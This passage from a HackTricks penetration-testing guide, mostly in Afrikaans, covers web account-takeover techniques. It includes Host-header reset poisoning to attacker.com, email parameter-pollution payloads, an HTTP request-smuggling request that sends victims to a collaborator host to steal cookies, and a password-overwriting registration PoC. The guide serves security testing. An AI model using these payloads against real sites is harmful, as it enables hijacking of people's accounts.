def handleResponse(req, interesting): if req.status != 401 and b’Invalid’ not in req.response: table.add(req)

</details>

- Probeer racing verification: submit dieselfde geldige OTP terselfdertyd in twee sessies; soms word een sessie 'n geverifieerde attacker account terwyl die victim flow ook slaag.
- Toets ook Host header poisoning op verification links (dieselfde as reset poisoning hieronder) om 'n leak te veroorsaak of verification op 'n attacker‑controlled host te voltooi.

<a class="content_ref" href="rate-limit-bypass.md"><span class="content_ref_label">Rate Limit Bypass</span></a>

<a class="content_ref" href="2fa-bypass.md"><span class="content_ref_label">2FA/MFA/OTP Bypass</span></a>

<a class="content_ref" href="email-injections.md"><span class="content_ref_label">Email Injections</span></a>

## Account Pre‑Hijacking Techniques (before the victim signs up)

'n Kragtige klas kwessies ontstaan wanneer 'n attacker aksies op die victim se e-pos uitvoer voordat die victim hul rekening skep, en later weer toegang herwin.

Sleutel tegnieke om te toets (pas aan by die teiken se vloei):

- Classic–Federated Merge
- Attacker: registers a classic account with victim email and sets a password
- Victim: later signs up with SSO (same email)
- Insecure merges may leave both parties logged in or resurrect the attacker’s access
- Unexpired Session Identifier
- Attacker: creates account and holds a long‑lived session (don’t log out)
- Victim: recovers/sets password and uses the account
- Test if old sessions stay valid after reset or MFA enablement
- Trojan Identifier
- Attacker: adds a secondary identifier to the pre‑created account (phone, additional email, or links attacker’s IdP)
- Victim: resets password; attacker later uses the trojan identifier to reset/login
- Unexpired Email Change
- Attacker: initiates email‑change to attacker mail and withholds confirmation
- Victim: recovers the account and starts using it
- Attacker: later completes the pending email‑change to steal the account
- Non‑Verifying IdP
- Attacker: uses an IdP that does not verify email ownership to assert `victim@…`
- Victim: signs up via classic route
- Service merges on email without checking `email_verified` or performing local verification

Praktiese wenke

- Versamel flows en endpoints vanaf web/mobile bundles. Soek na classic signup, SSO linking, email/phone change, en password reset endpoints.
- Skep realistiese automatisering om sessies lewendig te hou terwyl jy ander flows toets.
- Vir SSO‑toetse, staan 'n toets OIDC provider op en issue tokens met `email` claims vir die victim adres en `email_verified=false` om te kontroleer of die RP ongeverifieerde IdPs vertrou.
- Na enige password reset of email change, verifieer dat:
  - alle ander sessions en tokens ongeldig gemaak word,
  - hangende email/phone change vermoëns geannuleer word,
  - voorheen gelinkte IdPs/emails/phones weer ge‑verify word.

Let wel: Omvattende metodologie en gevallestudies van hierdie tegnieke is gedokumenteer in Microsoft’s pre‑hijacking research (sien References aan die einde).

<a class="content_ref" href="reset-password.md"><span class="content_ref_label">Reset/Forgotten Password Bypass</span></a>

<a class="content_ref" href="race-condition.md"><span class="content_ref_label">Race Condition</span></a>

## **Password Reset Takeover**

### Password Reset Token Leak Via Referrer <a href="#password-reset-token-leak-via-referrer" id="password-reset-token-leak-via-referrer"></a>

1. Request password reset to your email address
2. Click on the password reset link
3. Don’t change password
4. Click any 3rd party websites(eg: Facebook, twitter)
5. Intercept the request in Burp Suite proxy
6. Check if the referer header is leaking password reset token.

### Password Reset Poisoning <a href="#account-takeover-through-password-reset-poisoning" id="account-takeover-through-password-reset-poisoning"></a>

1. Intercept the password reset request in Burp Suite
2. Add or edit the following headers in Burp Suite : `Host: attacker.com`, `X-Forwarded-Host: attacker.com`
3. Forward the request with the modified header\
`http POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: attacker.com`
4. Look for a password reset URL based on the _host header_ like : `https://attacker.com/reset-password.php?token=TOKEN`

### Password Reset Via Email Parameter <a href="#password-reset-via-email-parameter" id="password-reset-via-email-parameter"></a>
```bash
# parameter pollution
email=victim@mail.com&email=hacker@mail.com

# array of emails
{"email":["victim@mail.com","hacker@mail.com"]}

# carbon copy
email=victim@mail.com%0A%0Dcc:hacker@mail.com
email=victim@mail.com%0A%0Dbcc:hacker@mail.com

# separator
email=victim@mail.com,hacker@mail.com
email=victim@mail.com%20hacker@mail.com
email=victim@mail.com|hacker@mail.com

IDOR op API-parameters

1. Aanvaller moet aanmeld met hul rekening en na die Change password-funksie gaan.
2. Begin Burp Suite en onderskep die versoek
3. Stuur dit na die repeater-tab en wysig die parameters : User ID/email
   powershell POST /api/changepass [...] ("form": {"email":"victim@email.com","password":"securepwd"})

Swak wagwoordherstel-token

Die wagwoord-terugstel-token moet ewekansig gegenereer word en elke keer uniek wees.
Probeer bepaal of die token verval of of dit altyd dieselfde is; in sommige gevalle is die generasie-algoritme swak en kan dit geraai word. Die volgende veranderlikes mag deur die algoritme gebruik word.

• Tydstempel
• Gebruiker-ID
• Gebruiker se e-pos
• Voornaam en van
• Geboortedatum
• Kriptografie
• Slegs syfers
• Korte tokenreeks ( karakters tussen [A-Z,a-z,0-9])
• Token-hergebruik
• Token-vervaldatum

Leaking Password Reset Token

1. Trigger ’n password reset request via die API/UI vir ’n spesifieke e-pos, bv: test@mail.com
2. Inspekteer die bedienerrespons en kyk vir resetToken
3. Gebruik dan die token in ’n URL soos https://example.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL]

Wagwoordherstel via gebruikersnaambotsing

1. Registreer op die stelsel met ’n gebruikersnaam identies aan die slagoffer se gebruikersnaam, maar met spasies voor en/of na die gebruikersnaam. bv: "admin "
2. Versoek ’n wagwoordherstel met jou kwaadwillige gebruikersnaam.
3. Gebruik die token wat na jou e-pos gestuur is en herstel die slagoffer se wagwoord.
4. Meld aan by die slagoffer se rekening met die nuwe wagwoord.

Die platform CTFd was kwesbaar vir hierdie aanval.
Sien: CVE-2020-7245

Account Takeover Via Cross Site Scripting

1. Vind ’n XSS binne die toepassing of ’n subdomein as die cookies geskop is na die ouer-domein : *.domain.com
2. Leak the current sessions cookie
3. Meld aan as die gebruiker deur die cookie te gebruik

Account Takeover Via HTTP Request Smuggling

1. Gebruik smuggler om die tipe HTTP Request Smuggling op te spoor (CL, TE, CL.TE)
   powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h\
2. Bou ’n versoek wat die POST / HTTP/1.1 sal oor skryf met die volgende data:
   GET http://something.burpcollaborator.net HTTP/1.1 X: met die doel om ’n open redirect te skep wat die slagoffers na burpcollab stuur en hul koekies steel\
3. Die finale versoek kan soos volg lyk

GET / HTTP/1.1
Transfer-Encoding: chunked
Host: something.com
User-Agent: Smuggler/v1.0
Content-Length: 83
0

GET http://something.burpcollaborator.net  HTTP/1.1
X: X

Hackerone-verslae oor die uitbuiting van hierdie fout\

• https://hackerone.com/reports/737140\
• https://hackerone.com/reports/771666

Account Takeover via CSRF

1. Skep ’n payload vir die CSRF, byv.: “HTML form met outo-submit vir ’n wagwoordverandering”
2. Stuur die payload

Account Takeover via JWT

JSON Web Token kan gebruik word om ’n gebruiker te autentiseer.

• Wysig die JWT met ’n ander User ID / Email
• Kontroleer vir ’n swak JWT-handtekening

JWT Vulnerabilities (Json Web Tokens)

Registration-as-Reset (Upsert on Existing Email)

Sommige signup handlers voer ’n upsert uit wanneer die verskafde email reeds bestaan. As die endpoint ’n minimale body met ’n email en password aanvaar en nie eienaarskapverifikasie afdwing nie, sal die stuur van die slagoffer se email hul password pre-auth oorskryf.

• Ontdekking: oes endpoint-names uit gebundelde JS (of mobile app traffic), en fuzz base paths soos /parents/application/v4/admin/FUZZ met ffuf/dirsearch.
• Metode-aanwysers: ’n GET wat boodskappe teruggee soos “Only POST request is allowed.” dui dikwels die korrekte verb aan en dat ’n JSON body verwag word.
• Minimale body waargeneem in die wild:

{"email":"victim@example.com","password":"New@12345"}

Voorbeeld PoC:

POST /parents/application/v4/admin/doRegistrationEntries HTTP/1.1
Host: www.target.tld
Content-Type: application/json

{"email":"victim@example.com","password":"New@12345"}

Impak: Volledige Account Takeover (ATO) sonder enige reset token, OTP, of email verification.

Verwysings

• How I Found a Critical Password Reset Bug (Registration upsert ATO)
• Microsoft MSRC – Pre‑hijacking attacks on web user accounts (May 2022)
• https://salmonsec.com/cheatsheet/account_takeover
• Hey there! You are using WhatsApp: Enumerating Three Billion Accounts for Security and Privacy (NDSS 2026 paper & dataset)

Tip

Leer en oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer en oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Leer en oefen Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Ondersteun HackTricks

• Kyk na die subskripsie planne!
• Sluit aan by die 💬 Discord groep of die telegram groep of volg ons op Twitter 🐦 @hacktricks_live.
• Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.